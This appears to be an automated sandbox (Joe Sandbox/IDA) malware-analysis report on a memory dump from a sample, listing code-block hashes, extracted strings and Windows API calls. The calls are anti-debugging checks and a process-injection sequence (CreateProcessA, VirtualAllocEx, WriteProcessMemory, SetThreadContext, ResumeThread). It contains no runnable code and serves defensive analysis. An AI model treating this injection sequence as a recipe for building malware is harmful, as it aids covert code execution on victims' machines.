                                                                    • String ID: >2Hp$>2Hp$iV$}.$}.
                                                                    • API String ID: 0-3561281039
                                                                    • Opcode ID: a59cd3ab1f098298d6905fe9e9946e51e8aa6bbcac3a8d4ba6da6c36554620b9
                                                                    • Instruction ID: 1a234646cdf4a2660f675ee1ced49aa25f261488f97dcf04bec0592096e7dc71
                                                                    • Opcode Fuzzy Hash: a59cd3ab1f098298d6905fe9e9946e51e8aa6bbcac3a8d4ba6da6c36554620b9
                                                                    • Instruction Fuzzy Hash: 1F7129B4E05209DFDB04CF95D4809EEFBB6FB88350F14C626DA15AB654E734AA42CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >2Hp$>2Hp$iV$}.$}.
                                                                    • API String ID: 0-3561281039
                                                                    • Opcode ID: 232ac459d57dcc32556eeb771747e66f5053ddb87c7488d925e74a1be95e9ec3
                                                                    • Instruction ID: b0031b9b9c5850482764b0febf5856b191275e50be4da4dc7417594e608afa3c
                                                                    • Opcode Fuzzy Hash: 232ac459d57dcc32556eeb771747e66f5053ddb87c7488d925e74a1be95e9ec3
                                                                    • Instruction Fuzzy Hash: 846129B5E0420A9FDB04CF95D4809EEFBB2FB89310F14C52ADA15A7654E734AA42CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9[5-$9[5-
                                                                    • API String ID: 0-333148375
                                                                    • Opcode ID: 5d2870cc0fdef26875438ed4fe580da20a57d646c2e26d56026a7e5e0a4f4460
                                                                    • Instruction ID: f30fcc72057ebc7f43ceba50d3fc0d357495bf070fb49fb11e53c49f1ac4375a
                                                                    • Opcode Fuzzy Hash: 5d2870cc0fdef26875438ed4fe580da20a57d646c2e26d56026a7e5e0a4f4460
                                                                    • Instruction Fuzzy Hash: 55223974D0921DCFDB64CFA4D9807EDBBB5BB49308F10A0AAD609B7A50E7349A81CF11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /R_$/R_
                                                                    • API String ID: 0-3495763888
                                                                    • Opcode ID: e107489272454f97db0f7aaa599469a68f5deb869c363b921a6d4bdd3ead0ade
                                                                    • Instruction ID: 4264c3e301d2234760bc512584585724c5f7d6b528b1d7746008023f4b360841
                                                                    • Opcode Fuzzy Hash: e107489272454f97db0f7aaa599469a68f5deb869c363b921a6d4bdd3ead0ade
                                                                    • Instruction Fuzzy Hash: 63123A74E0521DCFDB64CFA4D9807EDBBB5EB89304F10A4AAD609B7A50E7349A85CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c~]S$c~]S
                                                                    • API String ID: 0-1290760039
                                                                    • Opcode ID: da9e8bc33374747df0f21d659b77bdbc2553eb5174436fb3e7f0b319f4233a1a
                                                                    • Instruction ID: 6b3de24a2d1e2ebb0cab425ffe6351c1486a53272201c93819dd3c1d375a46fc
                                                                    • Opcode Fuzzy Hash: da9e8bc33374747df0f21d659b77bdbc2553eb5174436fb3e7f0b319f4233a1a
                                                                    • Instruction Fuzzy Hash: 17D199B4E0061ADFCB04CF96D5808AEFBB2FF89304F54C519D606AB654E734AA46CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 013BE6B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: CheckDebuggerPresentRemote
                                                                    • String ID:
                                                                    • API String ID: 3662101638-0
                                                                    • Opcode ID: 0c2c23e28cafb5dc946827dd11b35ffb8e72b8a17751aa5a06199fb7c4a754fe
                                                                    • Instruction ID: 4e4daae6cd82d7a1e92748ad80cceedd4889f4d41855e711ea37fe253cf1d3a2
                                                                    • Opcode Fuzzy Hash: 0c2c23e28cafb5dc946827dd11b35ffb8e72b8a17751aa5a06199fb7c4a754fe
                                                                    • Instruction Fuzzy Hash: E431B6B9D012189FCB10CFAAD880ADEFBB5BB48324F10842AE805B7700D734A9458FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: sq
                                                                    • API String ID: 0-161166840
                                                                    • Opcode ID: cd67d4c547824528be5d2521b55f243f58952127b290d3b8b3370dee7332ce9f
                                                                    • Instruction ID: 52535730f9aea221473d678810e9730ef7f9b5b4211b65c623f41d73554b9808
                                                                    • Opcode Fuzzy Hash: cd67d4c547824528be5d2521b55f243f58952127b290d3b8b3370dee7332ce9f
                                                                    • Instruction Fuzzy Hash: 83513AB0E04209CFCB08CFAAC5846EEFBF2EF89304F14D52AD516A7654E7349A418F95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PE
                                                                    • API String ID: 0-650672642
                                                                    • Opcode ID: 4eb1f09a641a68bd81a221883b0527643f20e365ecfd1022f3720af2e051f2d8
                                                                    • Instruction ID: 7b71edbfe77a38073caa6a5b0e3505fd8a9ef5fae1fd6908e7781a7af610ab0e
                                                                    • Opcode Fuzzy Hash: 4eb1f09a641a68bd81a221883b0527643f20e365ecfd1022f3720af2e051f2d8
                                                                    • Instruction Fuzzy Hash: 085137B4E012098FDF04CFAAE4819EEBBB6FF85304F14902AD505B7755EB309A01CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59996310bc607089a85d4dfddf39f0a3179b26bbd61065c630d7449c4c2df787
                                                                    • Instruction ID: 6570f04a00a88347e9cd4a73556b81e5cd37dee13a970fea18b751349ed31040
                                                                    • Opcode Fuzzy Hash: 59996310bc607089a85d4dfddf39f0a3179b26bbd61065c630d7449c4c2df787
                                                                    • Instruction Fuzzy Hash: DAD12974E152298FCB65CF65C880BDEB7B6AF99304F00A5EA960DB7640EB345B858F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c2fed083103f669a950ffc24ae41be1d76ae9d12ce7af8b33da2ec14b975905
                                                                    • Instruction ID: b1eea8d66aa95c44678013da910c340ec653755893f60f9453d001c1edcd11ab
                                                                    • Opcode Fuzzy Hash: 0c2fed083103f669a950ffc24ae41be1d76ae9d12ce7af8b33da2ec14b975905
                                                                    • Instruction Fuzzy Hash: 4BD11974E152298FDB65CF65C8807DEB7B6AF9A304F00A5E9960DB7640EB345B818F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40fadaa43a7139bfa9f6d72ad9def9fdcd707cce32c4395b013d7f01e44d5506
                                                                    • Instruction ID: 3a067abf8f0b5aa3395616342b76b0fb6ebaf4d63bf464f24bb31cd912e3bf7a
                                                                    • Opcode Fuzzy Hash: 40fadaa43a7139bfa9f6d72ad9def9fdcd707cce32c4395b013d7f01e44d5506
                                                                    • Instruction Fuzzy Hash: 5DD11974E152298FCB65CF64D880BDEB7B6AF9A304F10A5E9960DB7640EB345F808F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 62bb6d17fa0a3bc40afc0c5b050bb75d6bcf18fe3ce6d807c6fa143bdbbc93e0
                                                                    • Instruction ID: 82133874c1718a2ba602a6ba57fc279c12c1b353bfa58ae6846db5bb677d24fd
                                                                    • Opcode Fuzzy Hash: 62bb6d17fa0a3bc40afc0c5b050bb75d6bcf18fe3ce6d807c6fa143bdbbc93e0
                                                                    • Instruction Fuzzy Hash: 03B11B74E152298FCB65CF64C8807DEB7B5AF96304F10A5E9960DB7640EB345F808F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5509d2461e5aa42d71d1e38071e020d83b74961a38a2064d186f9b639312198
                                                                    • Instruction ID: 1ca65932fb1750f66ca3c93a5e5d0c0c57270fb1f6efee6327eeae1accc52f56
                                                                    • Opcode Fuzzy Hash: a5509d2461e5aa42d71d1e38071e020d83b74961a38a2064d186f9b639312198
                                                                    • Instruction Fuzzy Hash: 17B11A74E152298FCB65CF64C880BDEB7B5AF96304F10A5E9960DB7640EB345F818F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5d262aaf277f806b553b8e1ca1bac13950ac6787e7a614faf387e27179932ab
                                                                    • Instruction ID: 4c2357491c08651e307d112e83d0ae858e08da965b4f91a962193551c409b0dd
                                                                    • Opcode Fuzzy Hash: f5d262aaf277f806b553b8e1ca1bac13950ac6787e7a614faf387e27179932ab
                                                                    • Instruction Fuzzy Hash: 01B1CCB4D04119DBCB04CFA9C980AEEFBF5FB89308F189529C215BB645E334DA01CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3723b72e7632a466c2cad863b1396adb060d9a80f03ce8264918342acbeac177
                                                                    • Instruction ID: aa0d9de3dffd1f1178615a691612a61ea3b03d31d348c12772f1742ad095c76e
                                                                    • Opcode Fuzzy Hash: 3723b72e7632a466c2cad863b1396adb060d9a80f03ce8264918342acbeac177
                                                                    • Instruction Fuzzy Hash: CCB1E1B4E002198FDB04CFA9D9909EEBBF6BF89344F20852AD509BB764E7359901CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08b29404e02aa4d89150caa0fae927b41d986fd41c2804b05d5f8543db356266
                                                                    • Instruction ID: 3f96e7eb4b904d78c399eff77ddc8e9113af4a1aa195c2d937f5e9feaa5c39dc
                                                                    • Opcode Fuzzy Hash: 08b29404e02aa4d89150caa0fae927b41d986fd41c2804b05d5f8543db356266
                                                                    • Instruction Fuzzy Hash: 43A106B4E05219CFDB14DFE9D581ADEBBF2AF88304F24956AD606BB740E7305A418F60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 558: first block 13ba1e4-13ba289; CreateProcessA call in block 13ba3dc-13ba4ca (graph image not preserved)
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 013BA4B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 624: first block 13ba1f0-13ba289; CreateProcessA call in block 13ba3dc-13ba4ca (graph image not preserved)
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 013BA4B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 690: first block 13b9e61-13b9ed3; WriteProcessMemory call in block 13b9eea-13b9f4b (graph image not preserved)
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013B9F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 701: first block 13b9e68-13b9ed3; WriteProcessMemory call in block 13b9eea-13b9f4b (graph image not preserved)
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013B9F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 712: ReadProcessMemory call in first block 13b9fb8-13ba082 (graph image not preserved)
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013BA072
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 721: ReadProcessMemory call in first block 13b9fc0-13ba082 (graph image not preserved)
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 013BA072
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Graph 730: VirtualAllocEx call in first block 13b9d41-13b9e02 (graph image not preserved)
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 013B9DF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 013B9DF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,?), ref: 013B9CCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,?), ref: 013B9CCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: EnumWindows
                                                                    • String ID:
                                                                    • API String ID: 1129996299-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ResumeThread.KERNELBASE(?), ref: 013B9BAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ResumeThread.KERNELBASE(?), ref: 013B9BAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 013BE7A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: sA$sA
                                                                    • API String ID: 0-4265140970
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: sA
                                                                    • API String ID: 0-940647364
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d5
                                                                    • API String ID: 0-2429543555
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d5
                                                                    • API String ID: 0-2429543555
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 249816c78f2daf64e0885d0daed1e88567f58e5f3c5a67e16f2c6dd359eb488d
                                                                    • Instruction ID: 532ebfdd22e22a7e22e6ba46ecef4132ff9ad5df364f39a8bf357a4957c3c5b1
                                                                    • Opcode Fuzzy Hash: 249816c78f2daf64e0885d0daed1e88567f58e5f3c5a67e16f2c6dd359eb488d
                                                                    • Instruction Fuzzy Hash: A731AD71E056589BDB59CF6B8C542CABBF3AFC9300F14C1BAD40CAB265DB3049468F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 243404e80377ecc84d2794772721f1086f30bd2a3b42573887c1779223b83b83
                                                                    • Instruction ID: e9d27ea38ff36edcd09aaa180da09e0127c93c4fd87d4321f97e97034cc2bb4e
                                                                    • Opcode Fuzzy Hash: 243404e80377ecc84d2794772721f1086f30bd2a3b42573887c1779223b83b83
                                                                    • Instruction Fuzzy Hash: A4318971E016288BDB68CF6BDD446DEFBF7AFC9300F14C1BA950CA6264EB3059858E40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:9.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:6.2%
                                                                    Total number of Nodes:1648
                                                                    Total number of Limit Nodes:24
